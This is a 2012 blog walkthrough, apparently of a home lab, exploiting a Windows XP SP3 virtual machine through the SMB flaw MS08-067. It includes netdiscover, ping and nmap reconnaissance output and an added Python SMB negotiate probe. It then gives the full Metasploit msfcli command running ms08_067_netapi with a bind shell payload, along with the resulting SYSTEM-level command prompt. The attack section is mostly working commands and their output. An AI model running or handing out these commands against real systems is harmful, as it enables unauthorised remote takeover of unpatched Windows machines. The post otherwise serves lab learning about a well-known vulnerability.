Thursday, 02 February 2012

Exploiting Windows XP SP3 through the SMB vulnerability (MS08-067)

How do you exploit Windows XP SP3 from BackTrack 5 R1? This post walks through it step by step. Windows XP SP3 is installed as a VirtualBox guest; once it was set up, the first thing to check was that BackTrack could actually talk to it over the network. Before pinging anything I needed the guest's address, so I ran netdiscover, which passively collects ARP requests and replies on the local segment:

Currently scanning: 192.168.83.0/16   |   Screen View: Unique Hosts        
                                                                             
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                
 -----------------------------------------------------------------------------
 192.168.10.1    00:0c:42:e3:89:b1    03    180   Routerboard.com            
 192.168.10.246  08:00:27:a5:ad:44    01    060   CADMUS COMPUTER SYSTEMS    
 192.168.10.251  00:23:8b:e6:02:ee    01    060   Unknown vendor            
netdiscover lists every host that has sent ARP traffic on the segment. The entry with vendor CADMUS COMPUTER SYSTEMS (the 08:00:27 OUI is the one VirtualBox uses for its virtual NICs) is the XP guest, at 192.168.10.246; 192.168.10.1 is the RouterBoard gateway. Next I pinged the guest:

root@cupenk:~# ping 192.168.10.246
PING 192.168.10.246 (192.168.10.246) 56(84) bytes of data.
64 bytes from 192.168.10.246: icmp_seq=1 ttl=128 time=0.455 ms
64 bytes from 192.168.10.246: icmp_seq=2 ttl=128 time=0.469 ms
64 bytes from 192.168.10.246: icmp_seq=3 ttl=128 time=0.423 ms
64 bytes from 192.168.10.246: icmp_seq=4 ttl=128 time=0.483 ms
64 bytes from 192.168.10.246: icmp_seq=5 ttl=128 time=0.307 ms
^C
--- 192.168.10.246 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 0.307/0.427/0.483/0.066 ms
Five replies, no loss: BackTrack can reach the XP guest. The TTL of 128 is also the default initial TTL of Windows, a first hint at the OS. The next step is to find out which ports the guest exposes, with service and OS detection (-A) at the faster -T4 timing template:
root@cupenk:~# nmap -T4 -A -v 192.168.10.246

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 20:32 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 20:32
Scanning 192.168.10.246 [1 port]
Completed ARP Ping Scan at 20:32, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:32
Completed Parallel DNS resolution of 1 host. at 20:32, 0.08s elapsed
Initiating SYN Stealth Scan at 20:32
Scanning 192.168.10.246 [1000 ports]
Discovered open port 135/tcp on 192.168.10.246
Discovered open port 139/tcp on 192.168.10.246
Discovered open port 445/tcp on 192.168.10.246
Completed SYN Stealth Scan at 20:32, 1.24s elapsed (1000 total ports)
Initiating Service scan at 20:32
Scanning 3 services on 192.168.10.246
Completed Service scan at 20:32, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.10.246
NSE: Script scanning 192.168.10.246.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.19s elapsed
Nmap scan report for 192.168.10.246
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:A5:AD:44 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: 
|   NetBIOS name: CUP3NK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a5:ad:44 (Cadmus Computer Systems)
|   Names
|     CUP3NK<00>           Flags: <unique><active>
|     CUP3NK<20>           Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     WORKGROUP<1e>        Flags: <group><active>
|     WORKGROUP<1d>        Flags: <unique><active>
|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: cup3nk
|   NetBIOS computer name: CUP3NK
|   Workgroup: WORKGROUP
|_  System time: 2012-02-03 11:32:58 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.10.246

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
           Raw packets sent: 1103 (49.230KB) | Rcvd: 1017 (41.234KB)
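The host script results above come from a single SMB exchange that every one of these tools starts with, whether it is nmap's smb-security-mode and smb-os-discovery scripts or Metasploit's target auto-detection: the client sends an SMBv1 Negotiate Protocol request listing the dialects it speaks, and the server answers with the dialect it picked, its SecurityMode flags and a challenge. As an added example (not code from the original post, and not nmap's or Metasploit's own implementation), the script below builds that request, parses the response, and maps the SecurityMode bits to the same three lines nmap printed: user-level authentication, challenge/response passwords, and message signing disabled. Field layouts follow the published MS-CIFS description of the NT LM 0.12 negotiate response; the constant and function names are my own, the `make_sample_response` fixture is constructed rather than captured, and `probe` is the only function that touches the network.

```python
import socket
import struct

# Hypothetical example code: names and fixture are not from the post or from nmap/Metasploit.
SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS_REPLY = 0x80
CAP_EXTENDED_SECURITY = 0x80000000
DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12"]

# SecurityMode bits of an NT LM 0.12 Negotiate Response (MS-CIFS 2.2.4.52.2).
SEC_USER_LEVEL = 0x01         # user-level (not share-level) authentication
SEC_ENCRYPT_PASSWORDS = 0x02  # challenge/response instead of plaintext passwords
SEC_SIGNING_ENABLED = 0x04    # server is able to sign messages
SEC_SIGNING_REQUIRED = 0x08   # server insists on signing


def smb_header(command, flags=0x18, flags2=0x0001, mid=0):
    """32-byte SMB1 header: flags 0x18 = canonical paths + case-insensitive,
    flags2 0x0001 = long names, PID 0xfeff as many clients send it."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, flags, flags2,
                       0, b"\x00" * 8, 0, 0, 0xFEFF, 0, mid)


def netbios_frame(smb):
    """NetBIOS session header: type 0x00 (session message) + 24-bit length.
    A big-endian 32-bit length gives exactly that while len(smb) < 2**24."""
    return struct.pack(">I", len(smb)) + smb


def build_negotiate_request(mid=0):
    """SMB_COM_NEGOTIATE: WordCount=0, ByteCount, then 0x02 + dialect + NUL per dialect."""
    dialects = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    body = struct.pack("<BH", 0, len(dialects)) + dialects
    return netbios_frame(smb_header(SMB_COM_NEGOTIATE, mid=mid) + body)


def parse_negotiate_response(packet):
    """Decode a framed NT LM 0.12 Negotiate Response into the facts that matter."""
    if len(packet) < 4 + 32 + 1:
        raise ValueError("packet too short for an SMB header")
    if packet[0] != 0 or int.from_bytes(packet[1:4], "big") != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    smb = packet[4:]
    proto, command, status, flags = struct.unpack_from("<4sBIB", smb, 0)
    if proto != b"\xffSMB" or command != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB1 negotiate message")
    if not flags & SMB_FLAGS_REPLY:
        raise ValueError("reply bit not set: this is a request, not a response")
    if status != 0:
        raise ValueError("negotiate failed, status 0x%08x" % status)
    word_count = smb[32]  # 17 words only for the NT LM 0.12 response layout
    if word_count != 17 or len(smb) < 69:
        raise ValueError("not an NT LM 0.12 response (WordCount=%d)" % word_count)
    (dialect_index, security_mode, _mpx, _vcs, max_buffer, _raw, _key,
     capabilities, _time, _tz, challenge_len) = struct.unpack_from("<HBHHIIIIQhB", smb, 33)
    byte_count = struct.unpack_from("<H", smb, 67)[0]
    data = smb[69:69 + byte_count]
    if dialect_index >= len(DIALECTS):  # 0xFFFF = none of our dialects accepted
        raise ValueError("server accepted no offered dialect (index 0x%04x)" % dialect_index)
    info = {
        "dialect": DIALECTS[dialect_index].decode(),
        "user_level_auth": bool(security_mode & SEC_USER_LEVEL),
        "challenge_response": bool(security_mode & SEC_ENCRYPT_PASSWORDS),
        "signing_enabled": bool(security_mode & SEC_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SEC_SIGNING_REQUIRED),
        "extended_security": bool(capabilities & CAP_EXTENDED_SECURITY),
        "max_buffer": max_buffer, "challenge": None, "domain": None,
    }
    if info["extended_security"]:
        info["server_guid"] = data[:16]  # followed by a SPNEGO blob instead of a challenge
    else:
        info["challenge"] = data[:challenge_len]
        # No Unicode flag in our request, so the domain comes back as an OEM string.
        info["domain"] = data[challenge_len:].split(b"\x00")[0].decode("latin-1")
    return info


def signing_verdict(info):
    """Same wording as nmap's smb-security-mode, so the two can be compared directly."""
    if info["signing_required"]:
        return "Message signing required"
    if info["signing_enabled"]:
        return "Message signing enabled but not required"
    return "Message signing disabled (dangerous, but default)"


def probe(host, port=445, timeout=3.0):
    """Send one negotiate request to a live host and parse the answer (needs network)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        head = s.recv(4)
        length, body = int.from_bytes(head[1:4], "big"), b""
        while len(body) < length:
            chunk = s.recv(length - len(body))
            if not chunk:
                raise ConnectionError("connection closed mid-response")
            body += chunk
    return parse_negotiate_response(head + body)


def make_sample_response(security_mode=0x03, domain=b"WORKGROUP"):
    """Constructed fixture, not a capture: what a default XP box answers. SecurityMode
    0x03 = user-level + challenge/response, no signing, as nmap reported above."""
    challenge = bytes.fromhex("1122334455667788")
    words = struct.pack("<HBHHIIIIQhB", 2, security_mode, 50, 1, 16644, 65536,
                        0, 0x0000F3FD, 0, -480, len(challenge))
    data = challenge + domain + b"\x00"
    smb = (smb_header(SMB_COM_NEGOTIATE, flags=0x98) + bytes([17]) + words
           + struct.pack("<H", len(data)) + data)
    return netbios_frame(smb)


if __name__ == "__main__":
    import sys
    result = probe(sys.argv[1]) if len(sys.argv) > 1 else parse_negotiate_response(make_sample_response())
    for key, value in result.items():
        print("%-20s %r" % (key, value))
    print(signing_verdict(result))
```

Run it without arguments to decode the constructed fixture, or with the guest's address (`python3 smb_negotiate.py 192.168.10.246`, the file name being whatever you save it as) to query a real host. Signing disabled is the XP default and, independently of MS08-067, is what makes SMB authentication relayable by anyone on the path; requiring signing is the fix for that, and it is separate from installing the MS08-067 patch.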

The scan shows the classic Windows XP trio: 135 (RPC endpoint mapper), 139 (NetBIOS session service) and 445 (SMB over TCP). The host scripts add that the server only speaks SMBv1, that message signing is disabled, and that the OS is Windows XP. An XP SP3 box exposing SMB like this is the textbook target for MS08-067, the stack overflow in the Server service's path canonicalisation code (netapi32), although nothing in the nmap output proves the patch is missing; the only way to know is to try. So I ran Metasploit's ms08_067_netapi module from msfcli, letting it fingerprint and pick the target automatically (the target choice matters: a wrong one tends to crash the Server service rather than return a shell) with a bind shell payload, which works here because BackTrack can reach port 4444 on the guest directly on the flat LAN; through a firewall or NAT you would choose a reverse payload instead:
root@cupenk:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.10.246 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|______________________________________________________________________________|



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 798 exploits - 435 auxiliary - 132 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14678 updated today (2012.02.02)

RHOST => 192.168.10.246
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.10.246
[*] Command shell session 1 opened (192.168.10.248:47783 -> 192.168.10.246:4444) at 2012-02-02 20:54:14 +0700

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
And there it is: a Windows command prompt on the XP guest. The shell runs inside the compromised Server service, i.e. as LocalSystem, and ipconfig confirms which machine I am on:

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.246
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.1

C:\WINDOWS\system32>
